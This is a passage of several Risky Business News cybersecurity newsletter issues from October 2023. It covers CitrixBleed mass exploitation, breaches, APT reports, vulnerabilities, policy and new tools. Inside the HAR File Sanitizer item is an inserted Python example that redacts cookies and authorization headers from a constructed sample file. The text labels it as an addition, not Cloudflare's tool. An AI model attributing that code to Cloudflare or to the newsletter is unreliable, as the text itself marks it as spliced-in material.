NSPK hack: A hacking group named DumpForums claims to have breached the Russian National Payment Card System, a division of Russia's Central Bank and the operator of MIR payment cards. The group claims it gained access to customers' personal data and the NSPK's internal projects. The organization denied any hack and said that only its website was impacted. The DumpForums group has a history of targeting Russian organizations and dumping their data. [Additional coverage in RBC]

British Library incident: A cyber-attack has knocked out the IT network of the British Library for almost five days. The incident has impacted book orders and manual collections.

General tech and privacy

Microsoft cracks down on Xbox cheating: Microsoft will start blocking unauthorized Xbox controllers and accessories starting on November 12, 2023. The block will impact every Xbox owner who uses a third-party controller that did not obtain a Microsoft license for its product. The move will also have a huge impact on the game cheating scene and will likely spell the end for cheating devices such as XIM and Cronus Zen. [Additional coverage in Xfire]

Meta introduces paid tier in the EU: Social media company Meta is introducing a paid subscription for European users that will remove ads from its Facebook and Instagram services. The tier will cost €9.99/month on the web or €12.99/month for mobile users. Meta says it is introducing the new tier in response to the EU's GDPR regulation. The company says that by making users choose between the free and paid subscription, users are effectively making a conscious choice to have their personal information used for ad targeting.

Samsung Auto Blocker: Samsung has launched a new security feature for its latest line of smartphones. Named Auto Blocker, the feature prevents users from installing apps downloaded from outside the Samsung Galaxy and Google Play stores. The new feature can also block app side-loading operations from both the user interface and via automated commands sent via a USB debugging port. The feature is available for all Samsung phones running the One UI 6 home screen software.

Government, politics, and policy

Spyware alerts in India: Apple has notified over a half dozen lawmakers from India's main opposition parties that their iPhones have been targeted by state-sponsored attacks. Victims included figures from parties such as the National Congress, AIMIM, the AAP, and the Communist Party. The alleged hacking attempts took place weeks before India is set to elect members to its new Parliament. In a press conference, Rahul Gandhi, leader of the National Congress Party and Modi's main rival in the upcoming elections, accused the Indian government of the attempted hacks. Besides politicians, two Indian journalists and a member of an NGO also received notifications from Apple. [Additional coverage in TechCrunch]

Russia is developing a multiscanner: Russia's Minister of Digital Development says the ministry is working on developing a multi-scanner solution for Russia's internal market. The project is named the "National Multiscanner," is modeled after Google's VirusTotal service, and is expected to enter testing this year. Officials say the service will operate at full capacity in 2025. [Additional coverage in the Rossiyskaya Gazeta]

Canada bans WeChat/Kaspersky: The Canadian government has banned the use of WeChat and Kaspersky applications on government-issued mobile devices. Officials say the apps present an "unacceptable level of risk to privacy and security" for government workers. Canadian officials stopped short of calling the apps espionage tools. The ban entered into effect this week, on October 30.

CRI pledge: Officials from 48 countries attending the third edition of the International Counter Ransomware Initiative (CRI) are expected to sign a pledge to not pay ransoms demanded by ransomware gangs. This year's meeting is focused on improving information-sharing mechanisms surrounding ransomware attacks. To help get things moving, a White House official says the CRI plans to publish a list of cryptocurrency wallets associated with ransomware operations that can be tracked and blacklisted across member states. [Additional coverage in CyberScoop]

US Facial Recognition Act: House Democrats have introduced a bill named the Facial Recognition Act that would require law enforcement agencies to obtain a warrant before using facial recognition technology to identify a suspect.

WH AI EO: The Biden Administration signed an executive order that sets a national strategy and introduces new rules and standards for the development of artificial intelligence (AI) technologies. The executive order covers a lot of areas:

  • Companies developing AI models that have national security, economic, or health risks will have to notify the US government of their efforts and safety tests.

  • The executive order calls on Congress to pass legislation to protect Americans' privacy from AI technologies and laws to prevent AI from being used to discriminate against certain groups.

  • Orders NIST to develop AI safety standards.

  • Orders the DHS to investigate potential (ab)uses of AI and protect US critical systems from those threats (such as AI used for weapons of mass destruction, IP theft, cybersecurity, etc.).

  • Orders the DHS to use AI tooling in its daily operations, such as threat detection, prevention, and vulnerability assessments.

  • Orders AI-generated content to be labeled appropriately.

Besides the US, the G7 group also agreed on a Code of Conduct for AI companies, while the European Union is still working on AI legislation.

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Patrick Garrity, VP of Marketing and security researcher at Nucleus Security, on the rise and evolution of vulnerability threat intel and how CISA KEV's new ransomware section will be a game changer.

Cybercrime and threat intel

Magniber members detained: South Korean authorities have detained five employees of a data recovery company on suspicion of working with North Korean hackers. Officials say the company collected more than 3.4 billion won ($2.5 million) in data recovery fees from 778 companies hit by ransomware. South Korean police say the company conspired with North Korean hackers via email and Telegram and received a manual on how to recover encrypted systems. The company used targeted search keyword ads to advertise its services to impacted companies. While officials have not named the ransomware, several sources have told Risky Business News that the company was working with the Magniber gang, whose ransomware strain only targeted South Korean companies. According to South Korean security firm AhnLab, the Magniber crew has been inactive since August 25, representing the longest period of inactivity for the group since its launch in 2016. [Additional coverage in Chosun]

SIM swapper sentenced: A US judge has sentenced a 20-year-old Florida man to 30 months in prison for stealing almost $1 million from online cryptocurrency accounts using SIM swapping attacks.

Facebook malvertising: Bitdefender looks at a Facebook malvertising campaign deploying the NodeStealer malware.

DSA malvertising: Malwarebytes has discovered a novel malvertising campaign that abuses a Google feature named Dynamic Search Ads. Threat actors are abusing the feature for the bulk creation of malicious ads that automatically pull text from the pages they want to lure users to.

NuGet malware: ReversingLabs researchers have found a new wave of malicious packages uploaded on the NuGet portal. Researchers say the new packages appear to be connected to the campaign spotted by Phylum early last month. ReversingLabs believes the campaign has been going on since at least August this year and involved several hundred malicious packages.

Caffeine PhaaS: Cofense looks at the recent infrastructure used by the Caffeine Phishing-as-a-Service.

Prolific Puma: A new threat actor named Prolific Puma is running an on-demand URL-shortening service for malware gangs as part of a novel Cybercrime-as-a-Service offering. The primary purpose of the service is to provide shortened URLs that get blacklisted by security firms instead of a customer's actual infrastructure. Discovered by Infoblox, the service has been operating since at least January 2020 and has been primarily used in smishing operations.

Malware technical reports

EleKtra-Leak: A threat actor named EleKtra-Leak has been spotted scanning GitHub repositories for accidentally leaked AWS IAM tokens in order to gain access to AWS infrastructure and perform crypto-mining operations. Palo Alto Networks says this is one of the oldest crypto-mining operations known to date, going as far back as December 2020.

FakeUpdateRU: Sucuri researchers have looked at a malware distribution campaign named FakeUpdateRU that used compromised websites to distribute a fake update for the Chrome browser that infected user systems with RATs.

IcedID: Proofpoint looks at recent TA471 campaigns distributing a forked version of the IcedID malware. The two campaigns were extremely small and ran for only a week but contained a new IcedID version that Proofpoint described as "unique."

BiBi-Linux wiper: A pro-Hamas hacktivist group is deploying a new Linux data wiper in attacks targeting Israeli organizations. The wiper works by overwriting almost all of a local system's files with random data. The malware has been named BiBi-Linux because it renames all destroyed files with a file extension that begins with BiBi, the nickname of Israel's prime minister, Benjamin Netanyahu.

Sponsor Demo

Nucleus Security's COO Scott Kuffer shows Risky Business podcast host Patrick Gray their vulnerability management platform. It ingests scan outputs from a number of vulnerability identification tools, normalizes that information, and then allows vulnerability management teams to do things like assign responsibility for certain types of bugs to the correct people.

APTs and cyber-espionage

Lazarus KANDYKORN: Elastic's security team has published a breakdown of KANDYKORN, a macOS malware strain used by North Korean hacking group Lazarus in attacks targeting blockchain engineers working for a cryptocurrency exchange platform.

"Attackers impersonated blockchain engineering community members on a public Discord frequented by members of this community. The attacker social-engineered their initial victim, convincing them to download and decompress a ZIP archive containing malicious code. The victim believed they were installing an arbitrage bot, a software tool capable of profiting from cryptocurrency rate differences between platforms."

Pensive Ursa: PAN's Unit42 looks at a new version of Kazuar, a malware typically used by the Pensive Ursa (aka Turla, Uroburos) APT.

"The Ukrainian CERT reported in July 2023 that this version of Kazuar was targeting the Ukrainian defense sector. The threat group behind this variant was going after sensitive assets such as those found in Signal messages, source control and cloud platforms data."

Blind Eagle: Qihoo 360 looks at another wave of Blind Eagle (APT-C-36) operations. The report covers the Latin American APT trying to use the Amadey malware for recent operations.

AridViper: Palestinian APT group AridViper has been seen disguising spyware inside updates to non-malicious Android applications. Published by Cisco Talos, the report covers campaigns that predate the recent Hamas-Israeli conflict, as the vendor was "performing the due diligence with law enforcement."

Scarred Manticore: Check Point has a report on Scarred Manticore, an Iranian cyber threat group linked to MOIS (Ministry of Intelligence & Security). The report covers campaigns targeting government, military, telecom, IT, finance, and NGOs in the Middle East. The report also focuses on LIONTAIL, the group's latest malware framework. The group is linked to the Iranian actor DEV-0861 and, to some degree, to OilRig.

"Scarred Manticore's playbook has evolved from basic web shell attacks on Windows Servers to an advanced framework with diverse and powerful toolset that utilizes both custom-written and open-source components. A clear sign of Iran's cyber game leveling up."

Vulnerabilities, security research, and bug bounty

New Atlassian bug: Software company Atlassian has released a security update for a vulnerability (CVE-2023-22518) in Confluence servers that can be used to wipe customer systems. The patch notes include a rare message from the company's chief information security officer, a sight you don't usually see in software updates. Atlassian CISO Bala Sathiamurthy urged companies to "take immediate action" and install the software update to avoid data loss scenarios. Sathiamurthy says the vulnerability is extremely dangerous because it can be exploited remotely by unauthenticated attackers. Atlassian says that all versions of Confluence Data Center and Server are affected but that no attacks have been observed in the wild so far—although the bug's data-wiping capabilities will most likely entice some threat actors.

Cisco IOS XE PoC: Security firm Horizon3 has published fully working PoCs for the recent Cisco IOS XE zero-days tracked as CVE-2023-20273 and CVE-2023-20198. According to Censys, around 29K Cisco systems remain infected with backdoors after a threat actor exploited these zero-days last month.

F5 BIG-IP PoC: Quite a few proof-of-concept exploits have been posted online for the latest F5 BIG-IP vulnerability tracked as CVE-2023-46747. F5 confirmed active exploitation shortly after they went live.

Wyze PoC drama: Security researcher Peter Geissler has published a proof-of-concept exploit for Wyze IP cameras. Geissler says he published the exploit because Wyze released security updates for the Wyze Cam v3 model days before the Pwn2Own 2023 Toronto hacking contest, where he was scheduled to use the exploit. Geissler claims Wyze did it on purpose and only patched the camera model used in the contest and did not release patches for other models. The Wyze Cam v3 was hacked by four other researchers, regardless.

Infosec industry

ATT&CK v14: MITRE has released v14 of the ATT&CK framework. This new update comes with updates to the Enterprise and Mobile, Assets in ICS, and Mobile Structured Detections sections.

Acquisition news: Palo Alto Networks says it plans to acquire cloud security provider Dig Security.

New tool—Cascade: Academics from ETH Zurich have released Cascade, a RISC-V CPU fuzzer.

New tool—USB security tokens: Software developer Steffen Vogel has put together a spreadsheet comparing all the major USB security tokens.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss what is really at stake when it comes to cyber security.

Risky Biz News: CitrixBleed vulnerability goes from bad to disastrous

30 October 2023 at 01:30

This newsletter is brought to you by vulnerability management and analysis platform Nucleus Security. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

A Citrix vulnerability has entered the dangerous stage of mass exploitation as multiple threat actors are compromising unpatched devices all over the internet in a race with each other to steal their session tokens.

Known as CitrixBleed and tracked as CVE-2023-4966, the vulnerability impacts Citrix ADC and Citrix NetScaler, which are extremely complex networking devices used in large enterprise and government networks in multiple roles, such as gateways, proxies, caching, VPN servers, and a bunch of other stuff.

The vulnerability allows threat actors to send junk data to the Citrix OpenID component that will crash and leak a part of the device's memory. The bad part is that, in some cases, this memory may contain session tokens that attackers can collect and then bypass authentication and access the device. For a more technical explanation, check this write-up from Assetnote researchers.

Citrix released patches to fix the CitrixBleed memory leak earlier this month, on October 10.

The bug in itself is extremely bad as it is, but things took a turn for the worse a week later when Google Mandiant researchers came out to say they found evidence CitrixBleed had been exploited in the wild since late August—making the vulnerability one of this year's tens of actively exploited zero-days.

Mandiant said a threat actor was using the bug to gain access to Citrix gateways and then pivot to internal systems. The attacks were small in scale and targeted professional services, technology, and government organizations.

Things turned from bad to disastrous last week, around October 23-25, when several proof-of-concept exploits started popping up on GitHub and vulnerability portals.

Within a day, mass-exploitation was in full swing. At the time of writing, GreyNoise is tracking more than 120 IP addresses that are probing the internet and attempting to exploit CitrixBleed.

Some of the IPs are associated with initial access brokers, but at least a couple are associated with affiliates for the AlphV and BlackBasta ransomware groups, according to Chris Duggan, the Director of Cyber Threat Intelligence at KryptoKloud.

Security researcher Kevin Beaumont says that—just on Saturday, October 28—more than 20,000 Citrix ADC and NetScaler devices have had session tokens stolen.

Last week, Citrix seemed to have seen the disaster coming and published a blog post about the vulnerability, urging device owners to patch but also invalidate all their past session tokens so that even if they were swiped, they could not be abused in the future. Instructions on how to delete all past sessions are in the blog post.

Beaumont—who also has a write-up on this disaster—has also released a script to test if Citrix systems are vulnerable or still vulnerable after a patch.

The Shadowserver Foundation has also been following the attacks and how companies have been responding. Based on its internal data, the organization is still seeing almost 5,500 unpatched Citrix devices exposed on the internet.

Some numbers here look odd, depending on what each company sees, but neither we nor you should need extra arguments to be convinced to patch this as soon as possible. We've honestly lost track of all the bad Citrix bugs of the past, but every time one of them reached the stage of mass exploitation, loads of big orgs and government agencies—especially from the US and Germany—began to appear on ransomware leak sites.

We've all seen this movie before, and there's no happy ending. This is gonna haunt organizations for months, and I will not be surprised if collections of Citrix session tokens start appearing for sale on underground hacking forums in the next weeks or so.

Breaches, hacks, and security incidents

Stanford University breach: Stanford University is investigating a security breach at one of its departments. The university confirmed a breach after the Akira ransomware gang listed the organization on its leak site last week. (h/t DataBreaches.net)

Crimea DDoS attacks: Ukrainian hacktivist groups launched a series of massive DDoS attacks at the end of last week that have disrupted internet services across the occupied peninsula. The attacks targeted MirTelecom, Krymtelecom, and MirandaMedia and impacted both mobile and landline internet connections. Russian officials confirmed the attacks and subsequent downtime in a Telegram post.

Khashoggi lawsuit dismissed: A US judge has dismissed a lawsuit filed by the widow of murdered journalist Jamal Khashoggi against Israeli spyware maker NSO Group. Hanan Elatr sued NSO earlier this year in June after the company's Pegasus spyware was used to hack her and her husband's phones before his murder. The judge dismissed the case because the hacking accusations were not sufficiently connected to the state of Virginia, where the lawsuit was filed. [Additional coverage in the Washington Post/non-paywall]

LastPass hack thefts: The hackers who breached LastPass last year stole another $4.4 million worth of crypto-assets from 25 customers last week. The hackers are cracking stolen LastPass password vaults, recovering crypto-wallet seed phrases, and stealing money from user accounts. With the latest round of thefts, this brings the total to almost $40 million after they previously stole another $35 million from ~150 other users earlier this year.

Rosgosstrakh hack: A threat actor is selling the data of 730,000 customers of Rosgosstrakh, Russia's second-largest insurance company. The data contains documents such as bank statements, scanned identification documents, and life insurance contracts. According to a review of the stolen files, the documents go back as far as 2010. The hacked company is one of the first entities put on the US sanctions list after Russia's invasion of Ukraine in February 2022.

General tech and privacy

Plea for longer Win10 support: More than 20,000 members of the Public Interest Research Group have asked Microsoft to extend support for the Windows 10 operating system, which is scheduled to reach End-of-Life status in two years, in October 2025. The organization says that around 40% of the one billion devices that run Windows 10 can't be upgraded to Windows 11, which will create an unnecessary e-waste problem. Also known as PIRG, this is the same group that recently convinced Google to extend the warranty and support for older Chromebooks, citing similar arguments.

Windows 11 DNR: A feature named Discovery of Network-designated Resolvers (DNR) has landed in Windows 11 insider builds. The feature allows Windows 11 systems to automatically discover encrypted DNS servers in their local network, such as DoH or DoT servers.

Mastodon update: Mastodon admins have shipped a new update that adds support for Lists, allowing users better control over their home tabs.

iMessage Contact Key Verification: Apple's security team has published a breakdown of how their new "iMessage Contact Key Verification" feature works. The feature is designed to show alerts inside encrypted iMessage conversations whenever a new device is added to a participant's account. The feature was recently added to dev builds for the company's three major operating systems.

"iMessage Contact Key Verification is available in the developer previews of iOS 17.2, macOS 14.2, and watchOS 10.2."

iOS Private WiFi Address bug: Apple users are advised to update to the latest version of iOS and iPadOS to fix a privacy feature that never worked. Named Private WiFi Address, the feature was added in 2020 and allows users to hide their MAC address on local WiFi networks. Two security researchers say the feature never actually worked, and users who enabled it have been leaking their MAC address for the past three years. [Additional coverage in ArsTechnica]

Government, politics, and policy

NCSC PDNS: The UK's NCSC has launched a secure DNS service named PDNS. The service is currently available for UK central and local government organizations, the NHS, emergency services, the Ministry of Defense, and schools.

UK Economic Crime and Corporate Transparency Bill: The UK Parliament passed a new law last week that simplifies procedures for seizing crypto and fiat currency linked to money laundering and other fraudulent activities. Named the Economic Crime and Corporate Transparency Act, the law grants law enforcement the power to seize assets linked to criminal operations prior to obtaining a court conviction. The new law puts the UK on par with US law enforcement, allowing agencies to take a more proactive role in disrupting criminal operations.

CISA+HHS Toolkit: The US cybersecurity agency (CISA) and the country's health department (HHS) have released a joint cybersecurity toolkit for organizations in the healthcare sector.

NSA guidance: The NSA has published guidance [PDF] on how to evaluate commercially available embedded Field Programmable Gate Array (eFPGA) devices for security threats.

Defensive cyber exercises: Both the US and Australian militaries have held defensive cyber exercises this month.

Israel recruits spyware vendors in Hamas war: The Israeli government has allegedly hired two spyware companies to help track the location of hostages kidnapped by Hamas forces during the October 7 attack. The country's intelligence agency has asked NSO Group and Candiru to upgrade their spying capabilities in order to target the smartphones of kidnapped victims. According to a New York Times [non-paywall] report from earlier this month, Hamas members have used the smartphones of kidnapped Israelis to hijack online accounts and spread propaganda and threats of violence. More than 200 Israeli hostages are still captive in the Gaza Strip. [Additional coverage in Bloomberg/non-paywall]

Hamas Telegram ban: Instant messaging service Telegram has blocked some Telegram accounts and channels that have been identified as belonging to Hamas members. [Additional coverage in CNN]

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Patrick Garrity, VP of Marketing and security researcher at Nucleus Security, on the rise and evolution of vulnerability threat intel and how CISA KEV's new ransomware section will be a game changer.

Cybercrime and threat intel

RagnarLocker arrests: The two RagnarLocker suspects who were detained in Spain earlier this month were Alicante residents. Five suspects were detained in total, with the gang leader detained in Paris, France, and two others arrested in Latvia.

Kopeechka: Cybercrime groups are using a service named Kopeechka ("penny" in Russian) to create accounts in bulk on almost all of the internet's top platforms. Launched in 2019, the service allows threat actors to bypass CAPTCHA, email, and SMS verification systems and create thousands of accounts to be used for spam operations. Kopeechka supports all the main platforms, such as Facebook, Instagram, TikTok, Twitter, LinkedIn, Telegram, Discord, and Reddit. It can also target smaller platforms like Mastodon, Roblox, and Kick. Its API and scripting capabilities also allow threat actors to port its capabilities and target almost any online service.

New npm malware: Four malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

Celebrity spam: Ryan Gosling, Emily Blunt, and Jennifer Lopez have been this year's Top 3 most (ab)used celebrity names in phishing and spam campaigns, per McAfee.

Armenian campaign: CyberHUB has published an analysis of a malware campaign targeting Armenian users.

Jarjets ransomware: Broadcom's Symantec has seen two new ransomware strains named Jarjets and CATAKA being used in the wild. Not that many details are available about them so far.

VM-based botnets: In its Q3 threat report, internet infrastructure company Cloudflare says that the new HTTP/2 Rapid Reset technique is allowing DDoS botnets to become more efficient when running from virtual machines hosted on cloud infrastructure rather than using compromised IoT devices. Cloudflare says it is seeing VM cloud botnets generate 5,000 times more DDoS power than classic IoT botnets.

Malware technical reports

AvosLocker: Zscaler researchers have published a retrospective on the AvosLocker ransomware, a RaaS platform that operated between July 2021 and May 2023. The retrospective comes after CISA and the FBI updated their security advisory on the gang. It's unclear if the group returned with new attacks.

GHOSTPULSE: Elastic's security team has discovered a loader named GHOSTPULSE that is currently being used in campaigns leveraging compromised websites, SEO techniques, and malvertising.

Remcos RAT: Embee researchers have looked at the downloader component of the Remcos RAT.

Mystic Stealer: Zscaler researchers have published a new deep dive into Mystic Stealer, an infostealer that launched earlier this year in April. Previous reports on this threat are also available via CyFirma, InQuest, OALABS, and Zscaler (its first analysis).

Sponsor Demo

Nucleus Security's COO Scott Kuffer shows Risky Business podcast host Patrick Gray their vulnerability management platform. It ingests scan outputs from a number of vulnerability identification tools, normalizes that information, and then allows vulnerability management teams to do things like assign responsibility for certain types of bugs to the correct people.

APTs and cyber-espionage

SideCopy: Pakistan-based APT group SideCopy has adopted the recent WinRAR zero-day (CVE-2023-38831) in operations targeting India's Defense Ministry.

DoubleAlienRat: Chinese security firm NSFOCUS has discovered a new APT group named DoubleAlienRat that is currently targeting Chinese organizations. The company says the group possesses a high level of technical skills and comprehensive hacking techniques. The group also focuses on stealth by actively covering its intrusions. NSFOCUS believes the group operates out of an Asian country and specializes in attacking China.

North Korean mobile op: South Korea's National Intelligence Service has put out a warning that North Korean hackers have used a clone of a popular South Korean shopping app to infect South Koreans with malware. [Additional coverage in Newsis]

Lazarus PyPI supply-chain attack: Security firm HAWKEYE says evidence is mounting to suggest that the Lazarus North Korean hacking group is behind the VMConnect campaign that planted malicious packages on the PyPI portal. Per HAWKEYE, the number of malicious packages in this campaign has now reached 24.

Lazarus 2023 campaigns: The Lazarus North Korean cyber-espionage group has breached a software vendor on multiple occasions throughout 2023. Russian security firm Kaspersky has not named the vendor but said the campaign lasted from March to August 2023. The company says Lazarus operators sought to maintain access to the vendor's network and deploy malware to its customers as part of a software supply chain attack. The campaign is one of three major operations carried out by Lazarus this year where the final payload was the LPEClient malware. The other two targeted defense contractors and the cryptocurrency industry.

Vulnerabilities, security research, and bug bounty

HackerOne milestone: Bug bounty platform HackerOne says it surpassed a major milestone last week when it went over the $300 million mark in bug bounties paid to security researchers.

Vulnerability intelligence sources: This week's sponsor, Nucleus Security, has taken a look at the top vulnerability intelligence sources and how they overlap with each other. More in Patrick Garrity's LinkedIn post here.

Mirth Connect vulnerability: Security firm Horizon3 has published a write-up on CVE-2023-43208, a remote code execution bug they found in Mirth Connect, an open-source healthcare data integration platform. The vulnerability is a patch bypass for an older RCE tracked as CVE-2023-37679. The bug was patched two weeks ago in v4.4.1. More than 2,200 such systems are currently connected to the internet.

Unpatched WP plugin bug: NinTechNet researchers warn about a major vulnerability in the Deeper Comments WordPress plugin that has not been patched and allows full website takeover.

XORtigate: BishopFox has published a technical write-up on a Fortinet bug known as XORtigate, or CVE-2023-27997.

Lenovo LPE: SpecterOps has published an analysis of CVE-2023-4632, a local privilege escalation bug in the Lenovo updater. Lenovo patched the bug earlier this month.

VMWare security update: Enterprise software giant VMWare has published two security advisories to fix two sets of issues in its vCenter Server and Tools applications. The more severe of the two is the vCenter update, which fixes a 9.8/10-rated memory issue that can lead to remote code execution attacks (CVE-2023-34048). According to LeakIX, more than 1,100 VMWare vCenter servers are exposed online in a vulnerable configuration.

Major Ubiquiti vulnerability: Ubiquiti has released a security update last week to patch a major vulnerability in UniFi, a software backend for controlling the company's gateways, switches, and wireless access points. Tracked as CVE-2023-41721, the vulnerability allows threat actors to access device configuration data and has received a severity rating of 10/10. Ubiquiti devices that have "automatic updates" enabled have already been patched. Those that do not will need to be updated as soon as possible.

Infosec industry

Pwn2Own Toronto 2023: The 2023 edition of the Pwn2Own Toronto hacking contest has come to an end. The contest win went to Team Viettel from Vietnam, with 30 points and $180,000 in prize money. The Toronto (fall) edition of Pwn2Own focuses on hacking smartphones and IoT devices. Participants won more than $1 million in prize money for 58 successful exploits. Devices hacked at this year's edition included the Samsung Galaxy S23 and Xiaomi 13 phones, HP and Lexmark printers, Wyze cams, TP-Link routers, QNAP and Synology NAS devices, and others.

BSides Canberra videos: Talks from the BSides Canberra 2023 security conference, which took place at the end of September, are available on YouTube.

CISA re-releases LME: CISA has released a new version of Logging Made Easy, a toolkit that enhances log management on Windows devices. The tool was originally developed by the UK's NCSC agency in the late 2010s and retired in March this year. CISA picked up the tool and re-wrote it to cover recent Windows versions and logging capabilities. The tool is available for download via CISA's official GitHub account (here).

Tool update—Nuclei: The Nuclei vulnerability scanner has now reached v3.

New tool—HAR File Sanitizer: Cloudflare has open-sourced a tool named HAR File Sanitizer that can remove authentication cookies from HTTP Archive (HAR) files, which are produced by browsers and typically attached to tech support requests. The company created the tool after its own cookies were stolen from inside a HAR file it sent to identity provider Okta.
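To show what such a sanitizer has to do, here is an added example written for this entry (not Cloudflare's tool): it walks the HAR 1.2 structure and blanks every cookie value and every credential-bearing header on both the request and response side, leaving URLs, timings and status codes intact so the file stays useful for support. The sample HAR document, the hostname and the token strings are constructed for the demo.

```python
import copy
import json

# Header names whose values carry credentials or session material (lower-case).
SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization", "proxy-authorization"}
REDACTED = "[REDACTED]"


def _redact_headers(headers):
    """Blank the value of every sensitive header in a HAR header list (in place)."""
    for header in headers:
        if header.get("name", "").lower() in SENSITIVE_HEADERS:
            header["value"] = REDACTED


def _redact_cookies(cookies):
    """Blank the value of every parsed cookie object in a HAR cookie list (in place)."""
    for cookie in cookies:
        if "value" in cookie:
            cookie["value"] = REDACTED


def sanitize_har(har):
    """Return a deep copy of a HAR document with session material removed.

    Both the parsed `cookies` arrays and the raw Cookie/Set-Cookie/Authorization
    headers are redacted, because browsers record the same token in both places.
    The input document is not modified.
    """
    clean = copy.deepcopy(har)
    for entry in clean.get("log", {}).get("entries", []):
        for side in ("request", "response"):
            message = entry.get(side, {})
            _redact_headers(message.get("headers", []))
            _redact_cookies(message.get("cookies", []))
    return clean


def count_secrets(har):
    """Count cookie and sensitive-header values that are not yet redacted.

    Handy as a pre-flight check before a HAR file leaves the organisation:
    a non-zero result means the file still carries session material.
    """
    remaining = 0
    for entry in har.get("log", {}).get("entries", []):
        for side in ("request", "response"):
            message = entry.get(side, {})
            remaining += sum(
                1 for h in message.get("headers", [])
                if h.get("name", "").lower() in SENSITIVE_HEADERS and h.get("value") != REDACTED
            )
            remaining += sum(1 for c in message.get("cookies", []) if c.get("value") != REDACTED)
    return remaining


# Constructed sample HAR: one request/response pair with a session cookie,
# a bearer token and a rotated Set-Cookie, the way a browser export looks.
SAMPLE_HAR = {
    "log": {
        "version": "1.2",
        "creator": {"name": "constructed-sample", "version": "0"},
        "entries": [
            {
                "request": {
                    "method": "GET",
                    "url": "https://example.test/dashboard",
                    "headers": [
                        {"name": "Host", "value": "example.test"},
                        {"name": "Cookie", "value": "sid=constructed-session-token"},
                        {"name": "Authorization", "value": "Bearer constructed-bearer-token"},
                    ],
                    "cookies": [{"name": "sid", "value": "constructed-session-token"}],
                },
                "response": {
                    "status": 200,
                    "headers": [
                        {"name": "Content-Type", "value": "text/html"},
                        {"name": "Set-Cookie", "value": "sid=constructed-rotated-token; HttpOnly"},
                    ],
                    "cookies": [{"name": "sid", "value": "constructed-rotated-token"}],
                },
            }
        ],
    }
}


if __name__ == "__main__":
    print("secrets before:", count_secrets(SAMPLE_HAR))
    cleaned = sanitize_har(SAMPLE_HAR)
    print("secrets after: ", count_secrets(cleaned))
    print(json.dumps(cleaned, indent=2))
```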

New tool—Archive Pwn: Security firm Pentragrid has open-sourced a tool named Archive Pwn that can be used to create boobytrapped archive files, useful for testing vulnerabilities and exploits.

New tool—CVECrowd: A security researcher named Konstantin has launched a website named CVECrowd that shows what CVEs are currently popular and discussed on Mastodon.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss "spooky effects," aka when agencies play silly buggers with target computers.

Risky Biz News: First Kazakhstan-based APT discovered, tries to disguise itself as Azerbaijan

27 October 2023 at 00:30

This newsletter is brought to you by Resourcely, the company that can help you manage Terraform securely. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

In a blog post this week, researchers with Cisco Talos have formally linked a cyber-espionage group named YoroTrooper to Kazakhstan, making it the first official APT group operating out of the country.

First spotted in the wild in June 2022, the group has followed the pattern of most nascent cyber espionage programs, starting with run-of-the-mill commodity malware and slowly moving to custom capabilities in recent attacks.

Throughout the past year, the group has primarily targeted former Soviet states in what appears to be a classic intelligence collection operation meant to support Kazakhstan's state objectives.

Talos says the group has successfully compromised state-owned websites and accounts belonging to government officials in several CIS states. Past operations also targeted embassies and energy organizations in the same countries and even some EU agencies as well.

The group's attacks have been hard to pin on Kazakhstan. Talos says YoroTrooper has purchased VPN accounts and configured exit nodes to make its attacks appear to come from Azerbaijan, a country known to have a similar cyber-espionage program.

Researchers say that other clues also played a role in their attribution, such as the fact that the group rarely targets Kazakh entities—with the exception of an operation against the country's Anti-Corruption Agency.

Furthermore, the group appears to have what Talos calls a "defensive interest" in the country's state-owned email service—Mail.kz. Cisco researchers say the group often conducts security scans of the service but has never bothered attacking it or registering lookalike domains.

In addition, Talos has also spotted the group heavily using the Kazakh language and converting from Bitcoin to Kazakh currency. When it needs to use other languages—such as Azerbaijani—the group uses public tools like Google Translate to translate the text to Russian, Kazakhstan's second language, and for which there is better support on Google Translate.

Some Belarusian cyber-espionage groups appear to work together with Russian APTs, but this does not seem to be the case for YoroTrooper. Both Cisco reports on the group note that it has repeatedly targeted entities in Russia, so this is unlikely to be a second Ghostwriter APT.

Breaches, hacks, and security incidents

Cuban mercenaries: Pro-Ukrainian hacking group Cyber Resistance has "intercepted" new evidence of Cuban mercenaries joining the Russian Army to fight in Ukraine. The group hacked a Russian military officer earlier this year to reveal how Cubans were being recruited and transported to Russia to fight in Ukraine.

TransForm attack: The IT networks of five hospitals across Ontario are down following a cyberattack on a joint IT provider. TransForm says the incident has taken down appointment systems and some provisioning systems.

Meta locks pro-Palestine accounts: Social media company Meta has locked several Facebook and Instagram accounts that were posting pro-Palestine content. The company told NBC News it locked the accounts after it spotted a possible security breach. Meta says it is working to contact the original account owners and restore access.

CCleaner joins MOVEit list: Avast's CCleaner app has joined the list of entities impacted by this year's MOVEit hacks.

General tech and privacy

Win11 SMB encryption: Current insider preview versions of Windows 11 now support SMB encryption for outbound connections.

Government, politics, and policy

US OAGs sue Meta: State attorneys general in 41 states and the District of Columbia have filed a collective lawsuit against social media giant Meta. Officials say the company knowingly designed algorithms and features to addict children and teens to its Instagram and Facebook platforms. Officials point the finger at features like infinite scrolling, near-constant notifications, and autoplay videos that create a sense of FOMO and cause mental health issues for young teens. The lawsuit is the result of a multi-state probe the coalition began in 2021 that started in a handful of states and expanded nationwide.

ICE's GOST: 404 Media has a profile on Giant Oak Search Technology (GOST), a database system used by ICE to find "derogatory" social media posts by people seeking entry into the US.

Online Safety Bill becomes law: The UK's Online Safety Bill has passed through the Parliament and has become an official UK law. Now known as the Online Safety Act, its provisions force tech companies to take responsibility for the content they host on their platforms. The Act gives the UK government the power to force internet companies to remove child sexual abuse material, online scams, anonymous trolls, deepfakes, and other content the government will deem illegal. Companies that fail to act on the UK government's requests face fines of up to £18 million ($22 million), or 10% of their global annual turnover. Tech executives could also face prison time under certain circumstances.

